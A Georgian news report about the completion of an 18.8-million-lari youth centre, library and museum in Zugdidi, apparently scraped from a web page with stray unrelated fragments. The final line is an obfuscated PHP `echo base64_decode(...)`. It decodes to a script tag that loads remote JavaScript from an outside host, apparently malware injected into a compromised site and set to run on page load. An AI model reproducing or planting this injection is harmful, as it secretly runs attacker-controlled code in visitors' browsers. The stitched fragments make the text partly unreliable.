celsiusi
ავერსი შნაიდერი

 რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს ინფორმაციით, მუნიციპალური განვითარების ფონდმა ქალაქ ზუგდიდში ზვიად გამსახურდიას სახელობის ახალგაზრდული ცენტრისა და ბიბლიოთეკის მშენებლობა დაასრულა.

უწყების ცნობით, ბიბლიოთეკა დადიანების სასახლის მიმდებარე ტერიტორიაზე აშენდა.

„3000 კვმ ფართის შენობაში მოეწყო თანამედროვე სტანდარტის მულტიფუნქციური ცენტრი, რომელიც ადმინისტრაციული პერსონალისათვის მოიცავს უახლესი ტექნოლოგიებით აღჭურვილ მედიათეკას. ასევე, მოეწყო ამფითეატრის ტიპის სამკითხველო, სამუშაო, სალექციო, საკონფერენციო და სამუზეუმო დარბაზები და კაფე.

ახალგაზრდული ცენტრის, ბიბლიოთეკისა და მუზეუმის კონცეფცია გულისხმობს ისეთი თანამედროვე სივრცის შექმნას, რომელიც ადგილობრივ ახალგაზრდებს შეუქმნის განვითარების, საკუთარი იდეების დამუშავების, მათი წარდგენისა და დანერგვის სათანადო პირობებს.

ახალგაზრდული ცენტრის შენობაში, რომლის არქიტექტურულ პროექტზე ქართველმა სპეციალისტებმა იმუშავეს, გათვალისწინებულია ტურისტული საინფორმაციო ცენტრის განთავსებაც, ხოლო სამუზეუმო დარბაზში მოეწყობა დროებითი და მუდმივი ექსპოზიციები.

ბიბლიოთეკის შენობა აღჭურვილია თანამედროვე ენერგოეფექტური გათბობა-გაგრილება-კონდიცირების, ხანძარქრობის, გარე და შიდა ვიდეო მეთვალყურეობის, გახმოვანების და BMS (Building Management System) - ერთიანი მართვის სისტემებით. მშენებლობის პროცესში გამოყენებული ენერგოეფექტური მასალები და დამონტაჟებული დანადგარები შენობას სითბოს მაქსიმალურად შენარჩუნების საშუალებას აძლევს, რითაც მისი ექსპლუატაცია ნაკლებ ხარჯთან იქნება დაკავშირებული.

ბიბლიოთეკის სამკითხველო, სამუშაო და სალექციო სივრცეები უკვე აღჭურვილია კომპიუტერებითა და მონიტორით.

ზუგდიდის ახალგაზრდული ცენტრის მშენებლობის პროექტი აზიის განვითარების ბანკისგან მიღებული სესხისა და სახელმწიფო ბიუჯეტის თანადაფინანსებით განხორციელდა, რომლის ღირებულებამ 18.8 მილიონი ლარი შეადგინა”,- ნათქვამია ინფორმაციაში.

89
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");